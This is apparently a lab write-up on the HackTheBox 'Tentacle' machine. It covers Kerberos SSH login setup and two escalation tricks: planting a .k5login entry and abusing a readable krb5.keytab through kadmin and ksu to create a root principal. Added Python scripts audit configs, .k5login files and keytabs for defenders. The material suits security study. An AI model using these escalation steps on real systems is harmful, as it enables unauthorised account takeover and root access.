Authentication method gssapi-with-mic (krb5.conf file)
If we receive the following message while trying to authenticate with any service:
```
debug1: SSH2_MSG_EXT_INFO received
debug1: kex_input_ext_info: server-sig-algs=<ssh-ed25519,ssh-rsa,rsa-sha2-256,rsa-sha2-512,ssh-dss,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521>
debug1: SSH2_MSG_SERVICE_ACCEPT received
debug1: Authentications that can continue: gssapi-keyex,gssapi-with-mic,password
debug1: Next authentication method: gssapi-with-mic
```
This means that Kerberos is handling authentication for these services. To make use of this configuration we need to install the krb5-user package, which sets up our Kali machine as a Kerberos client:
```
apt-get install krb5-user
```
When the installer prompts for a default realm we enter the realcorp.htb domain: ![[Pasted image 20230123134328.png]] Then enter the machine's IP at the next two prompts: ![[Pasted image 20230123134422.png]] The installation creates a file called /etc/krb5.conf, which we modify as follows:
```
[libdefaults]
    default_realm = REALCORP.HTB
[realms]
    REALCORP.HTB = {
        kdc = srv01.realcorp.htb:88
    }
[domain_realm]
    .realcorp.htb = REALCORP.HTB
    realcorp.htb = REALCORP.HTB
```
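To see how a client reads that file, the following added example (not code from the write-up) parses the krb5.conf shown above and resolves a hostname to its realm and KDC with the same [domain_realm] rules MIT libkrb5 applies: the exact hostname first, then each parent domain with a leading dot. The fallback to default_realm is a simplification of the client's behaviour, which would also consult DNS; the krb5.conf text is constructed from the configuration above.

```python
# Added example (not from the write-up): resolve realm and KDC for a host
# from a krb5.conf the way a Kerberos client does, so the [domain_realm]
# mapping can be checked before running kinit/ssh.
import re

# Constructed from the krb5.conf shown in the write-up.
KRB5_CONF = """
[libdefaults]
    default_realm = REALCORP.HTB
[realms]
    REALCORP.HTB = {
        kdc = srv01.realcorp.htb:88
    }
[domain_realm]
    .realcorp.htb = REALCORP.HTB
    realcorp.htb = REALCORP.HTB
"""

def parse_krb5_conf(text):
    """Parse the subset of krb5.conf syntax used here: [sections],
    'key = value' lines (repeatable, so values are lists) and one level
    of 'name = { ... }' subsections as used in [realms]."""
    conf, section, sub = {}, None, None
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].strip()
        if not line:
            continue
        m = re.fullmatch(r'\[([\w.-]+)\]', line)
        if m:
            section = conf.setdefault(m.group(1), {})
            sub = None
            continue
        if section is None:
            continue                      # key outside any section: ignore
        if line == '}':
            sub = None
            continue
        m = re.fullmatch(r'(\S+)\s*=\s*\{', line)
        if m:
            sub = section.setdefault(m.group(1), {})
            continue
        key, _, value = line.partition('=')
        target = sub if sub is not None else section
        target.setdefault(key.strip(), []).append(value.strip())
    return conf

def realm_for_host(conf, hostname):
    """Apply [domain_realm] as MIT libkrb5 does: try the exact hostname,
    then each parent domain with a leading dot ('.realcorp.htb', '.htb').
    A parent written without the dot ('realcorp.htb') only matches the
    host itself. Falling back to default_realm is a simplification; a
    real client would also try DNS before giving up."""
    host = hostname.lower().rstrip('.')
    mapping = {k.lower(): v[0] for k, v in conf.get('domain_realm', {}).items()}
    labels = host.split('.')
    candidates = [host] + ['.' + '.'.join(labels[i:]) for i in range(1, len(labels))]
    for cand in candidates:
        if cand in mapping:
            return mapping[cand]
    return conf.get('libdefaults', {}).get('default_realm', [None])[0]

def kdcs_for_realm(conf, realm):
    """KDC addresses configured for a realm (empty list if none)."""
    return conf.get('realms', {}).get(realm, {}).get('kdc', [])

if __name__ == '__main__':
    conf = parse_krb5_conf(KRB5_CONF)
    for host in ('srv01.realcorp.htb', 'realcorp.htb', 'other.example.com'):
        realm = realm_for_host(conf, host)
        print(host, '->', realm, kdcs_for_realm(conf, realm))
```

Running it shows that both srv01.realcorp.htb and realcorp.htb map to REALCORP.HTB with srv01.realcorp.htb:88 as the KDC, which is exactly what kinit and ssh need from this file.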
Then, before connecting to SSH, we request a ticket-granting ticket with kinit, which asks for the user's password:
```
kinit j.nakazawa
Password for j.nakazawa@REALCORP.HTB:
```
After submitting the password, klist shows the ticket that was obtained:
```
klist
Ticket cache: FILE:/tmp/krb5cc_0
Default principal: j.nakazawa@REALCORP.HTB
Valid starting       Expires              Service principal
01/23/2023 15:10:38  01/24/2023 15:10:38  krbtgt/REALCORP.HTB@REALCORP.HTB
```
This should allow us to log in via SSH without a password:
```
ssh j.nakazawa@10.10.10.224
j.nakazawa@10.10.10.224's password:
```
If SSH still prompts for a password, the clock skew is probably too large (Kerberos rejects tickets when the client and KDC clocks differ by more than 5 minutes by default), so we need to sync our machine's time with the DC:
```
ntpdate 10.10.10.224
2023-01-23 15:13:01.504643 (-0500) +1.004272 +/- 0.038425 10.10.10.224 s10 no-leap
CLOCK: time stepped by 1.004272
```
Then we'll be able to log in:
```
ssh j.nakazawa@10.10.10.224
Activate the web console with: systemctl enable --now cockpit.socket
Last failed login: Mon Jan 23 20:05:55 GMT 2023 from 10.10.14.2 on ssh:notty
There were 11 failed login attempts since the last successful login.
Last login: Thu Dec 24 06:02:06 2020 from 10.10.14.2
[j.nakazawa@srv01 ~]$ whoami
j.nakazawa
```
Note that if we want to log in to a specific machine via its hostname, the /etc/hosts file needs to list that hostname as the first name on the machine's line (the canonical name), not as a later alias.
Examples: Tentacle
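The two things that silently break the login above, clock skew and the /etc/hosts name order, are easy to check before running ssh. The following added example (not code from the write-up) does both: it pulls the canonical name for an IP out of an /etc/hosts text and it parses the offset from an ntpdate result line like the one shown above, comparing it with libkrb5's default 300-second clockskew. The hosts contents are constructed; the ntpdate line is the one from the write-up.

```python
# Added example (not part of the write-up): pre-flight checks for a Kerberos
# client. Kerberos rejects tickets when the clock skew exceeds libkrb5's
# default clockskew of 300 seconds, and the name the service ticket is
# requested for is the canonical hostname, i.e. the first name on the
# matching /etc/hosts line. Sample inputs are constructed.

MAX_SKEW_SECONDS = 300   # MIT krb5 default 'clockskew'

# Constructed /etc/hosts contents: the first has the FQDN as an alias only,
# the second has it in the canonical (first) position.
BAD_HOSTS = "10.10.10.224 realcorp.htb srv01.realcorp.htb\n"
GOOD_HOSTS = "127.0.0.1 localhost\n10.10.10.224 srv01.realcorp.htb realcorp.htb\n"
# ntpdate result line as printed in the write-up.
NTPDATE_LINE = "2023-01-23 15:13:01.504643 (-0500) +1.004272 +/- 0.038425 10.10.10.224 s10 no-leap"

def canonical_name(hosts_text, ip):
    """First hostname on the /etc/hosts line for ip, or None if absent."""
    for raw in hosts_text.splitlines():
        fields = raw.split('#', 1)[0].split()
        if len(fields) >= 2 and fields[0] == ip:
            return fields[1]
    return None

def hosts_finding(hosts_text, ip, expected_fqdn):
    """Describe what is wrong with the hosts entry, or None if it is fine."""
    canon = canonical_name(hosts_text, ip)
    if canon is None:
        return f'no /etc/hosts entry for {ip}'
    if canon.lower() != expected_fqdn.lower():
        return (f'{expected_fqdn} is not the first name on the {ip} line '
                f'(canonical name is {canon}), so host/{canon} would be requested')
    return None

def ntpdate_offset(line):
    """Offset in seconds from an ntpdate result line (fourth whitespace field)."""
    return float(line.split()[3])

def skew_finding(offset_seconds):
    """Describe an offset that Kerberos would reject, or None if acceptable."""
    if abs(offset_seconds) > MAX_SKEW_SECONDS:
        return f'clock skew {offset_seconds:+.3f}s exceeds {MAX_SKEW_SECONDS}s; sync the clock first'
    return None

if __name__ == '__main__':
    for label, hosts in (('bad', BAD_HOSTS), ('good', GOOD_HOSTS)):
        print(label, hosts_finding(hosts, '10.10.10.224', 'srv01.realcorp.htb'))
    offset = ntpdate_offset(NTPDATE_LINE)
    print('offset', offset, skew_finding(offset))
```

With the write-up's one-second offset the skew check passes, so in that case the SSH failure was worth a second look; a skew of several minutes would have been flagged before any ticket was requested.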
.k5login file
If we can create a .k5login file in a user's home directory, we can log in as that user whenever we already hold a ticket for a principal listed in it (obtained with kinit from the krb5-user package). All we need to do is write the principal into the file:
```
echo 'j.nakazawa@REALCORP.HTB' > .k5login
```
Examples: Tentacle
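Because a .k5login file is an allow-list of principals for the account it lives in, it is also what a defender should review. The following added example (not code from the write-up) audits the contents of such a file for malformed lines, principals from another realm, admin instances and principals other than the account owner, and separately checks the file's ownership and mode. The sample file contents are constructed; the ownership rule follows MIT krb5's requirement that .k5login be owned by the user or root, while the group/other-write rule is this example's own stricter policy.

```python
# Added example (not from the write-up): audit a user's .k5login. The file
# lists principals allowed to log in as that account, so unexpected entries
# and a file someone else could have written are the things to look for.
import re

# user[/instance]@REALM; MIT does not support comments in .k5login.
PRINCIPAL_RE = re.compile(r'^([^@/\s]+)(?:/([^@/\s]+))?@([A-Za-z0-9.-]+)$')

# Constructed sample .k5login contents for the account j.nakazawa.
SAMPLE_K5LOGIN = (
    "j.nakazawa@REALCORP.HTB\n"
    "root/admin@REALCORP.HTB\n"
    "attacker@EVIL.LOCAL\n"
    "not a principal\n"
)

def audit_k5login(text, expected_realm, expected_user=None):
    """Return (line_number, issue) findings for the contents of a .k5login."""
    findings, seen = [], set()
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            findings.append((lineno, 'empty line'))
            continue
        m = PRINCIPAL_RE.match(line)
        if not m:
            findings.append((lineno, f'malformed principal {line!r}'))
            continue
        user, instance, realm = m.groups()
        if line in seen:
            findings.append((lineno, f'duplicate entry {line}'))
        seen.add(line)
        if realm != expected_realm:
            findings.append((lineno, f'foreign realm {realm}'))
        if instance == 'admin':
            findings.append((lineno, f'admin instance {user}/{instance} granted a login'))
        if expected_user and instance is None and user != expected_user:
            findings.append((lineno, f'{user}@{realm} can log in as {expected_user}'))
    return findings

def ownership_findings(file_uid, file_mode, owner_uid):
    """Flag a .k5login not owned by the account (or root), or writable by
    group/others. Pass os.stat(path).st_uid / st_mode for a real file."""
    findings = []
    if file_uid not in (owner_uid, 0):
        findings.append(f'owned by uid {file_uid}, not the account or root')
    if file_mode & 0o022:
        findings.append(f'writable by group/others (mode {file_mode & 0o777:o})')
    return findings

if __name__ == '__main__':
    for lineno, issue in audit_k5login(SAMPLE_K5LOGIN, 'REALCORP.HTB', 'j.nakazawa'):
        print(f'line {lineno}: {issue}')
    # Constructed stat values: owned by another uid and world-writable.
    for issue in ownership_findings(1001, 0o100666, 1000):
        print(issue)
```

In a real sweep you would run audit_k5login over every /home/*/.k5login and feed os.stat() results to ownership_findings; any entry that is not the account's own principal in the expected realm deserves an explanation.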
Abusing krb5.keytab
If we obtain a krb5.keytab file, we can use it to list the principals it holds, authenticate as one of them to kadmin, create new principals and log in with them:
```
klist -k /etc/krb5.keytab # list all the Principals
kadmin -kt /etc/krb5.keytab -p kadmin/admin@REALCORP.HTB # Interactive shell as Principal kadmin/admin; this needs to be a Principal listed by klist
kadmin: addprinc root@REALCORP.HTB # Create a Principal (password required)
Enter password for principal "root@REALCORP.HTB":
Re-enter password for principal "root@REALCORP.HTB":
Principal "root@REALCORP.HTB" created.
ksu
WARNING: Your password may be exposed if you enter it here and are logged in remotely using an unsecure (non-encrypted) channel.
Kerberos password for root@REALCORP.HTB: :
Authenticated root@REALCORP.HTB
```
Finally we can use the new principal to log in to the machine.
Examples: Tentacle
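The reason a readable keytab is so valuable is that every entry in it is a long-term key: whoever can read the file can authenticate as each principal without knowing a password. The following added example (not code from the write-up or from MIT krb5) parses the keytab file format (version 0x0502) and reports what a defender wants from it: which principals are present, which still use deprecated enctypes, and whether a kadmin principal is stored there. The keytab bytes are constructed inside the script with dummy keys; build_entry exists only so the example runs offline.

```python
# Added example (not from the write-up): parse a krb5 keytab (file format
# version 0x0502) and report weak enctypes and admin-capable principals.
# Anyone who can read the file can authenticate as every principal in it.
import struct

ENCTYPE_NAMES = {
    1: 'des-cbc-crc', 3: 'des-cbc-md5', 16: 'des3-cbc-sha1',
    17: 'aes128-cts-hmac-sha1-96', 18: 'aes256-cts-hmac-sha1-96',
    19: 'aes128-cts-hmac-sha256-128', 20: 'aes256-cts-hmac-sha384-192',
    23: 'arcfour-hmac',
}
WEAK_ENCTYPES = {1, 3, 23}   # single DES and RC4, deprecated by RFC 6649 / RFC 8429

def _counted(buf, off):
    """Read a uint16-length-prefixed byte string at off; return (bytes, new_off)."""
    (n,) = struct.unpack_from('>H', buf, off)
    return buf[off + 2:off + 2 + n], off + 2 + n

def parse_keytab(data):
    """Return a dict per live entry: principal, enctype, kvno, timestamp, key_len."""
    if data[:2] != b'\x05\x02':
        raise ValueError('only keytab format version 0x0502 is handled')
    off, entries = 2, []
    while off + 4 <= len(data):
        (size,) = struct.unpack_from('>i', data, off)   # size excludes this field
        off += 4
        if size < 0:                  # negative size marks a deleted slot
            off += -size
            continue
        end = off + size
        (ncomp,) = struct.unpack_from('>H', data, off)  # v2: realm not counted
        off += 2
        realm, off = _counted(data, off)
        comps = []
        for _ in range(ncomp):
            comp, off = _counted(data, off)
            comps.append(comp.decode())
        name_type, timestamp, vno8 = struct.unpack_from('>IIB', data, off)
        off += 9
        (enctype,) = struct.unpack_from('>H', data, off)
        off += 2
        key, off = _counted(data, off)
        kvno = vno8
        if end - off >= 4:            # optional 32-bit kvno overrides the 8-bit one
            (kvno,) = struct.unpack_from('>I', data, off)
        off = end
        entries.append({'principal': '/'.join(comps) + '@' + realm.decode(),
                        'enctype': enctype, 'kvno': kvno,
                        'timestamp': timestamp, 'key_len': len(key)})
    return entries

def audit_keytab(data):
    """(principal, issue) pairs for weak enctypes and kadmin principals."""
    findings = []
    for e in parse_keytab(data):
        name = ENCTYPE_NAMES.get(e['enctype'], str(e['enctype']))
        if e['enctype'] in WEAK_ENCTYPES:
            findings.append((e['principal'], f'weak enctype {name}'))
        if e['principal'].startswith('kadmin/'):
            findings.append((e['principal'], 'kadmin principal: usable with kadmin -kt'))
    return findings

def build_entry(principal, enctype, kvno, key, timestamp=1674486638):
    """Serialize one keytab entry in the layout parse_keytab reads (helper
    for the constructed sample; timestamp is an arbitrary constructed value)."""
    name, realm = principal.rsplit('@', 1)
    comps = name.split('/')
    body = struct.pack('>H', len(comps)) + struct.pack('>H', len(realm)) + realm.encode()
    for c in comps:
        body += struct.pack('>H', len(c)) + c.encode()
    body += struct.pack('>IIB', 1, timestamp, kvno & 0xff)   # name_type 1 = NT-PRINCIPAL
    body += struct.pack('>HH', enctype, len(key)) + key
    body += struct.pack('>I', kvno)
    return struct.pack('>i', len(body)) + body

# Constructed sample keytab with dummy keys: a host key on AES-256 and a
# kadmin key still on RC4.
SAMPLE_KEYTAB = (b'\x05\x02'
                 + build_entry('host/srv01.realcorp.htb@REALCORP.HTB', 18, 2, bytes(range(32)))
                 + build_entry('kadmin/admin@REALCORP.HTB', 23, 1, b'\x11' * 16))

if __name__ == '__main__':
    for e in parse_keytab(SAMPLE_KEYTAB):
        print(e['principal'], ENCTYPE_NAMES.get(e['enctype']), 'kvno', e['kvno'])
    for principal, issue in audit_keytab(SAMPLE_KEYTAB):
        print('FINDING:', principal, issue)
```

Pointing parse_keytab at open('/etc/krb5.keytab', 'rb').read() gives the same inventory as klist -k plus the enctype and kvno per entry; combined with the file's mode (it should be readable only by root and the services that need it) that is the check to run on any host that keeps a keytab.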